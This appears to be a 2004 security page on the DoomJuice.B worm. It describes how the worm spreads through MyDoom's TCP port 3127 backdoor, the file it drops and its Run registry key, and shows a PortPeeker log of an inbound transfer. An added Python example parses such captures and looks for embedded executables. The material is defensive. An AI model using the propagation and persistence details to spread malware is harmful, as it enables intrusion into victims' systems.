DoomJuice.B PortPeeker Capture

DoomJuice.B scans the internet on TCP port 3127 looking for MyDoom-infected systems, because MyDoom will execute a file sent to TCP port 3127.  When DoomJuice.B is executed by MyDoom, it creates a file regedit.exe in the Windows System directory: C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).  Do not confuse this with regedit.exe in the Windows directory, which is the Windows Registry Editor program.  DoomJuice.B also creates a "NeroCheck" = "%System%\regedit.exe" entry in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run or HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
 

If a network behind a firewall logged by Link Logger contained an active DoomJuice.B-infected system, you would see a large volume of red alerts for outbound TCP port 3127 scans appear in Link Logger.

 

PortPeeker Capture of DoomJuice.B

TCP Connection Request
--- 12/02/2004 12:51:47.506

62.201.72.62 : 1492 TCP Connected ID = 5
--- 12/02/2004 12:51:47.567
Status Code: 0 OK

62.201.72.62 : 1492 TCP Data In Length 5125 bytes : MD5 = 3BB9041E19466420D1AF628371C1A7FC
--- 12/02/2004 12:51:47.647

62.201.72.62 : 1492 TCP Disconnected ID = 5
--- 12/02/2004 12:51:54.406
Status Code: 0 OK
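
Added example (not part of the original page and not PortPeeker code): Python that rebuilds the payload of a "TCP Data In" record, checks it against the length and MD5 in the record header, and reports whether the payload carries a Windows executable and where it starts. The record layout (header line, then offset, hex and ASCII columns) follows the capture record on this page; the function names, the sample bytes and the address 192.0.2.10 are constructed for illustration.

```python
import hashlib
import re
import struct

HEADER = re.compile(r"TCP Data In Length (\d+) bytes : MD5 = ([0-9A-Fa-f]{32})")
OFFSET = re.compile(r"^[0-9A-Fa-f]{4,8}$")

def parse_capture(text):
    """Rebuild the payload of the first 'TCP Data In' record and verify it."""
    length = md5 = None
    buf = bytearray()
    for line in text.splitlines():
        if length is None:
            m = HEADER.search(line)
            if m:
                length, md5 = int(m.group(1)), m.group(2).lower()
            continue
        tokens = line.split()
        if not tokens or not OFFSET.match(tokens[0]):
            continue  # timestamp or status line, not a dump row
        if int(tokens[0], 16) != len(buf):
            raise ValueError("dump rows are not contiguous")
        # The declared length fixes how many byte columns this row holds,
        # so text in the ASCII column is never mistaken for hex.
        want = min(16, length - len(buf))
        buf += bytes.fromhex("".join(tokens[1:1 + want]))
        if len(buf) == length:
            break
    if length is None or len(buf) != length:
        raise ValueError("payload is missing or truncated")
    if hashlib.md5(buf).hexdigest() != md5:
        raise ValueError("MD5 in the record header does not match the dump")
    return bytes(buf)

def find_pe(payload):
    """Return details of the first well-formed PE image in payload, or None."""
    mz = payload.find(b"MZ")
    while mz != -1:
        if mz + 0x40 <= len(payload):
            # e_lfanew at MZ+0x3C points to the "PE\0\0" signature.
            pe = mz + struct.unpack_from("<I", payload, mz + 0x3C)[0]
            if payload[pe:pe + 4] == b"PE\0\0" and pe + 24 <= len(payload):
                machine, count, _, _, _, opt_size, _ = struct.unpack_from(
                    "<HHIIIHH", payload, pe + 4)
                table = pe + 24 + opt_size  # section table follows the headers
                names = [payload[o:o + 8].rstrip(b"\0").decode("latin-1")
                         for o in range(table, table + 40 * min(count, 96), 40)
                         if o + 40 <= len(payload)]
                return {"mz_offset": mz, "machine": machine, "sections": names,
                        "upx_named": any(n.startswith("UPX") for n in names)}
        mz = payload.find(b"MZ", mz + 1)
    return None

def build_sample():
    """Constructed input: a header-only PE stub after 5 filler bytes."""
    dos = bytearray(b"MZ".ljust(0x40, b"\0"))
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x010F)
    sections = b"".join(n.ljust(40, b"\0") for n in (b"UPX0", b"UPX1"))
    data = b"\x01\x02\x03\x04\x05" + bytes(dos) + b"PE\0\0" + coff + sections
    lines = ["192.0.2.10 : 1492 TCP Data In Length %d bytes : MD5 = %s"
             % (len(data), hashlib.md5(data).hexdigest().upper()),
             "--- 01/01/2004 00:00:00.000"]
    for off in range(0, len(data), 16):
        row = data[off:off + 16]
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in row)
        lines.append("%04X %s %s" % (off, " ".join("%02X" % b for b in row), text))
    return "\n".join(lines)

SAMPLE = build_sample()

if __name__ == "__main__":
    print(find_pe(parse_capture(SAMPLE)))
```

An executable that begins at a non-zero offset inside an inbound payload on TCP port 3127 is consistent with the file-delivery behaviour described at the top of this page.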
 

MyDoom.A and MyDoom.B worm Removal Tool from Microsoft

 

Page last updated on February 12, 2004